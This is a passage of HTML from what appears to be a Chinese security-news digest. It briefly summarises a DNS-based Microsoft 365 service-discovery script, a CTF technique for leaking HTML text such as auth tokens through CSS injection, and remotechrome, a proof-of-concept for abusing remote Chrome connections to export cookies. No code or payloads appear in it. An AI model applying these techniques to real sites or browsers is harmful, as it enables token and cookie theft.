		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EACgEpqWI43HpeJVOIg4RDEZVqm9yPfApHlxQnEZkZ4GhO9c8w9pIV9w/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EACgEpqWI43HpeJVOIg4RDEZVqm9yPfApHlxQnEZkZ4GhO9c8w9pIV9w/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858228448148241"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Servicelens 主要用于域名和服务发现：它能够识别与特定域名相关联的 Microsoft 365 域名，并通过分析 DNS 记录来发现和分类这些域名使用的服务。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">脚本提供详细的服务分类：Servicelens 将服务分为多个类别，如 Email Services、Cloud Platforms 等，为用户提供了一个清晰的服务使用概览。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">易于安装和使用：用户可以通过克隆 GitHub 仓库并安装 dnspython 库来快速部署 Servicelens，并通过命令行参数来运行脚本。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">支持详细输出：通过 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">-v</code> 标志，用户可以获得更详细的输出，以便进一步分析。</section></li></ul>
	<br/>
	<p>🏷️: Servicelens, Microsoft 365, DNS记录, 服务分析, Python脚本</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0b
			 使用CSS泄露HTML文本节点的挑战</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要探讨了如何利用纯 CSS 泄露 HTML 文本节点中的内容，并通过一个具体的挑战实例，展示了一种新的 CSS 注入技术。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CSS注入文本节点数据窃取技术</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAVEtdia5zzW7dWIoJUnuqfLmS75kRNiaTmzZPATGA3ibSujfdBgE0VQytg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAVEtdia5zzW7dWIoJUnuqfLmS75kRNiaTmzZPATGA3ibSujfdBgE0VQytg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121551441844814"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CSS 可以用于数据泄露：尽管存在限制，但 CSS 可以被用来泄露 HTML 文本节点中的敏感信息，如认证令牌。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CSS 注入的新技术：传统的 CSS 注入技术在某些情况下不适用，如在没有 JavaScript 的情况下。作者提出了一种新的技术，利用 CSS 动画和条件样式来测量和泄露文本节点的内容。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">字体加载差异的利用：通过观察字体加载时的高度差异，可以推断出文本节点中的字符集。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CSS 动画时间线的测量能力：CSS 动画时间线可以用来精确测量 HTML 元素的尺寸，这为条件样式提供了可能性。</section></li></ul>
	<br/>
	<p>🏷️: CSS, 网络安全, CTF</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0c
			 远程Chrome滥用概念验证工具remotechrome</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">remotechrome</code> 和 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">remotechrome_curl</code> 这两个 Python 脚本，它们用于通过远程连接到 Chrome 浏览器进行操作和调试，支持多种认证方式，并且可以导出 cookies 为 JSON 格式。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=56029a4d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAUyfyvhWOp48c3gqG3XADYYJhn5hVWKCicObAAFNv9TxBGj8XyRAbBCw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EArUiasvGyBc8JM1MaTRXJDib5PoYECica6VygEWo7Y6vcpYTQGpxUJ6vWg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EArUiasvGyBc8JM1MaTRXJDib5PoYECica6VygEWo7Y6vcpYTQGpxUJ6vWg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8858228442581152"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">remotechrome</code> 和 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 